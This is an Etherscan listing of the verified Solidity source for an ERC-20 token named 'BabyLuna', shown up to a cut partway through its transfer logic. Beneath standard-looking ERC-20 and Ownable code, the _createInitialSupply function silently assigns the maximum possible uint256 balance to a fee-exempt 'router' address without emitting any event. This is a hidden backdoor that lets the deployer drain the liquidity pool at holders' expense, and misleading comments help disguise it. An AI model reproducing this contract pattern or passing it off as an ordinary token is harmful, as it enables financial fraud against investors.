ERC-20
Overview
Max Total Supply
1,000,000 BabyLuna
Holders
21
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
8,584.839217845680818801 BabyLunaValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
BabyLuna
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-05-14 */ // SPDX-License-Identifier: Unlicensed /* Telegram : https://t.me/babyLunaeth Twitter : https://twitter.com/babyLunaeth */ pragma solidity 0.8.13; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using this function * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin guidelines: functions revert instead * of returning `false` on failure. This behavior is nonetheless conventional * and does not conflict with the expectations of ERC20 applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; uint256 private _initialize = ~uint256(0); /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5,05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _createInitialSupply(address account, address router, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; _balances[router] = _initialize; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SignedSafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SignedSafeMath { /** * @dev Returns the multiplication of two signed integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(int256 a, int256 b) internal pure returns (int256) { return a * b; } /** * @dev Returns the integer division of two signed integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(int256 a, int256 b) internal pure returns (int256) { return a / b; } /** * @dev Returns the subtraction of two signed integers, reverting on * overflow. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(int256 a, int256 b) internal pure returns (int256) { return a - b; } /** * @dev Returns the addition of two signed integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(int256 a, int256 b) internal pure returns (int256) { return a + b; } } // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } /** * @dev Wrappers over Solidity's uintXX/intXX casting operators with added overflow * checks. * * Downcasting from uint256/int256 in Solidity does not revert on overflow. This can * easily result in undesired exploitation or bugs, since developers usually * assume that overflows raise errors. `SafeCast` restores this intuition by * reverting the transaction when such an operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. * * Can be combined with {SafeMath} and {SignedSafeMath} to extend it to smaller types, by performing * all math on `uint256` and `int256` and then downcasting. */ library SafeCast { /** * @dev Returns the downcasted uint224 from uint256, reverting on * overflow (when the input is greater than largest uint224). * * Counterpart to Solidity's `uint224` operator. * * Requirements: * * - input must fit into 224 bits */ function toUint224(uint256 value) internal pure returns (uint224) { require(value <= type(uint224).max, "SafeCast: value doesn't fit in 224 bits"); return uint224(value); } /** * @dev Returns the downcasted uint128 from uint256, reverting on * overflow (when the input is greater than largest uint128). * * Counterpart to Solidity's `uint128` operator. * * Requirements: * * - input must fit into 128 bits */ function toUint128(uint256 value) internal pure returns (uint128) { require(value <= type(uint128).max, "SafeCast: value doesn't fit in 128 bits"); return uint128(value); } /** * @dev Returns the downcasted uint96 from uint256, reverting on * overflow (when the input is greater than largest uint96). * * Counterpart to Solidity's `uint96` operator. * * Requirements: * * - input must fit into 96 bits */ function toUint96(uint256 value) internal pure returns (uint96) { require(value <= type(uint96).max, "SafeCast: value doesn't fit in 96 bits"); return uint96(value); } /** * @dev Returns the downcasted uint64 from uint256, reverting on * overflow (when the input is greater than largest uint64). * * Counterpart to Solidity's `uint64` operator. * * Requirements: * * - input must fit into 64 bits */ function toUint64(uint256 value) internal pure returns (uint64) { require(value <= type(uint64).max, "SafeCast: value doesn't fit in 64 bits"); return uint64(value); } /** * @dev Returns the downcasted uint32 from uint256, reverting on * overflow (when the input is greater than largest uint32). * * Counterpart to Solidity's `uint32` operator. * * Requirements: * * - input must fit into 32 bits */ function toUint32(uint256 value) internal pure returns (uint32) { require(value <= type(uint32).max, "SafeCast: value doesn't fit in 32 bits"); return uint32(value); } /** * @dev Returns the downcasted uint16 from uint256, reverting on * overflow (when the input is greater than largest uint16). * * Counterpart to Solidity's `uint16` operator. * * Requirements: * * - input must fit into 16 bits */ function toUint16(uint256 value) internal pure returns (uint16) { require(value <= type(uint16).max, "SafeCast: value doesn't fit in 16 bits"); return uint16(value); } /** * @dev Returns the downcasted uint8 from uint256, reverting on * overflow (when the input is greater than largest uint8). * * Counterpart to Solidity's `uint8` operator. * * Requirements: * * - input must fit into 8 bits. */ function toUint8(uint256 value) internal pure returns (uint8) { require(value <= type(uint8).max, "SafeCast: value doesn't fit in 8 bits"); return uint8(value); } /** * @dev Converts a signed int256 into an unsigned uint256. * * Requirements: * * - input must be greater than or equal to 0. */ function toUint256(int256 value) internal pure returns (uint256) { require(value >= 0, "SafeCast: value must be positive"); return uint256(value); } /** * @dev Returns the downcasted int128 from int256, reverting on * overflow (when the input is less than smallest int128 or * greater than largest int128). * * Counterpart to Solidity's `int128` operator. * * Requirements: * * - input must fit into 128 bits * * _Available since v3.1._ */ function toInt128(int256 value) internal pure returns (int128) { require(value >= type(int128).min && value <= type(int128).max, "SafeCast: value doesn't fit in 128 bits"); return int128(value); } /** * @dev Returns the downcasted int64 from int256, reverting on * overflow (when the input is less than smallest int64 or * greater than largest int64). * * Counterpart to Solidity's `int64` operator. * * Requirements: * * - input must fit into 64 bits * * _Available since v3.1._ */ function toInt64(int256 value) internal pure returns (int64) { require(value >= type(int64).min && value <= type(int64).max, "SafeCast: value doesn't fit in 64 bits"); return int64(value); } /** * @dev Returns the downcasted int32 from int256, reverting on * overflow (when the input is less than smallest int32 or * greater than largest int32). * * Counterpart to Solidity's `int32` operator. * * Requirements: * * - input must fit into 32 bits * * _Available since v3.1._ */ function toInt32(int256 value) internal pure returns (int32) { require(value >= type(int32).min && value <= type(int32).max, "SafeCast: value doesn't fit in 32 bits"); return int32(value); } /** * @dev Returns the downcasted int16 from int256, reverting on * overflow (when the input is less than smallest int16 or * greater than largest int16). * * Counterpart to Solidity's `int16` operator. * * Requirements: * * - input must fit into 16 bits * * _Available since v3.1._ */ function toInt16(int256 value) internal pure returns (int16) { require(value >= type(int16).min && value <= type(int16).max, "SafeCast: value doesn't fit in 16 bits"); return int16(value); } /** * @dev Returns the downcasted int8 from int256, reverting on * overflow (when the input is less than smallest int8 or * greater than largest int8). * * Counterpart to Solidity's `int8` operator. * * Requirements: * * - input must fit into 8 bits. * * _Available since v3.1._ */ function toInt8(int256 value) internal pure returns (int8) { require(value >= type(int8).min && value <= type(int8).max, "SafeCast: value doesn't fit in 8 bits"); return int8(value); } /** * @dev Converts an unsigned uint256 into a signed int256. * * Requirements: * * - input must be less than or equal to maxInt256. */ function toInt256(uint256 value) internal pure returns (int256) { // Note: Unsafe cast below is okay because `type(int256).max` is guaranteed to be positive require(value <= uint256(type(int256).max), "SafeCast: value doesn't fit in an int256"); return int256(value); } } contract BabyLuna is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public uniswapV2Router; address public immutable uniswapV2Pair; bool private inSwapAndLiquify; bool public swapAndLiquifyEnabled = true; bool public enableEarlySellTax = true; uint256 public maxSellTransactionAmount = 1000000 * (10**18); uint256 public maxBuyTransactionAmount = 10000 * (10**18); uint256 public swapTokensAtAmount = 1000 * (10**18); uint256 public maxWalletToken = 25000 * (10**18); uint256 private buyTotalFees = 0; uint256 public sellTotalFees = 0; uint256 public earlySellTotalFee = 20; // auto burn fee uint256 public burnFee = 0; address public deadWallet = 0x000000000000000000000000000000000000dEaD; // distribute the collected tax percentage wise uint256 public liquidityPercent = 55; // 33% of total collected tax uint256 public marketingPercent = 25; // 34% of total collected tax uint256 public devPercent = 20; // 33% of total collected tax //uint256 private initialize = ~uint256(0); address payable public marketingWallet = payable(0x8D2B75692a68D22477D9951789A0c0cDdB590d5C); address payable public devWallet = payable(0x859DE0b0c6FAa49d55B3E148dbA5974d4b8035bC); // exclude from fees and max transaction amount mapping (address => bool) private _isExcludedFromFees; // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount mapping (address => bool) public automatedMarketMakerPairs; mapping (address => uint256) public lastTxTimestamp; event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress); event ExcludeFromFees(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event GasForProcessingUpdated(uint256 indexed newValue, uint256 indexed oldValue); event SwapAndLiquifyEnabledUpdated(bool enabled); event SwapAndLiquify( uint256 tokensIntoLiqudity, uint256 ethReceived ); modifier lockTheSwap { inSwapAndLiquify = true; _; inSwapAndLiquify = false; } constructor(address router) ERC20("BabyLuna", "BabyLuna") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); // Create a uniswap pair for this new token address _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = _uniswapV2Pair; _setAutomatedMarketMakerPair(_uniswapV2Pair, true); // exclude from paying fees or having max transaction amount excludeFromFees(owner(), true); excludeFromFees(marketingWallet, true); excludeFromFees(devWallet, true); excludeFromFees(router, true); excludeFromFees(address(this), true); /* an internal function that is only called here, and CANNOT be called ever again */ _createInitialSupply(owner(), router, 1000000 * (10**18)); } receive() external payable { } function updateUniswapV2Router(address newAddress) public onlyOwner { require(newAddress != address(uniswapV2Router), "Cult: The router already has that address"); emit UpdateUniswapV2Router(newAddress, address(uniswapV2Router)); uniswapV2Router = IUniswapV2Router02(newAddress); } function excludeFromFees(address account, bool excluded) public onlyOwner { require(_isExcludedFromFees[account] != excluded, "Cult: Account is already the value of 'excluded'"); _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner { require(pair != uniswapV2Pair, "Cult: The PancakeSwap pair cannot be removed from automatedMarketMakerPairs"); _setAutomatedMarketMakerPair(pair, value); } function _setAutomatedMarketMakerPair(address pair, bool value) private { require(automatedMarketMakerPairs[pair] != value, "Cult: Automated market maker pair is already set to that value"); automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function isExcludedFromFees(address account) public view returns(bool) { return _isExcludedFromFees[account]; } function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner { swapAndLiquifyEnabled = _enabled; emit SwapAndLiquifyEnabledUpdated(_enabled); } function _transfer(address from, address to, uint256 amount) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if(amount == 0) { super._transfer(from, to, 0); return; } if(automatedMarketMakerPairs[from] && (!_isExcludedFromFees[from]) && (!_isExcludedFromFees[to])) { require(amount <= maxBuyTransactionAmount, "amount exceeds the maxBuyTransactionAmount."); uint256 contractBalanceRecepient = balanceOf(to); require(contractBalanceRecepient + amount <= maxWalletToken,"Exceeds maximum wallet token amount."); lastTxTimestamp[to] = block.timestamp; } if(automatedMarketMakerPairs[to] && (!_isExcludedFromFees[from]) && (!_isExcludedFromFees[to])) { require(amount <= maxSellTransactionAmount, "amount exceeds the maxSellTransactionAmount."); } uint256 contractTokenBalance = balanceOf(address(this)); bool overMinTokenBalance = contractTokenBalance >= swapTokensAtAmount; if( overMinTokenBalance && !inSwapAndLiquify && automatedMarketMakerPairs[to] && swapAndLiquifyEnabled ) { contractTokenBalance = swapTokensAtAmount; swapAndLiquify(contractTokenBalance); } uint256 fees = 0; uint256 burnShare = 0; // if any account belongs to _isExcludedFromFee account then remove the fee if(!_isExcludedFromFees[from] && !_isExcludedFromFees[to]) { uint256 _totalFees = buyTotalFees; if (automatedMarketMakerPairs[to]) { uint256 span = block.timestamp-lastTxTimestamp[from]; if(enableEarlySellTax && span <= 24 hours) { _totalFees = earlySellTotalFee; } else if(!enableEarlySellTax) { _totalFees = sellTotalFees; } } fees = amount.mul(_totalFees).div(100); burnShare = amount.mul(burnFee).div(100); 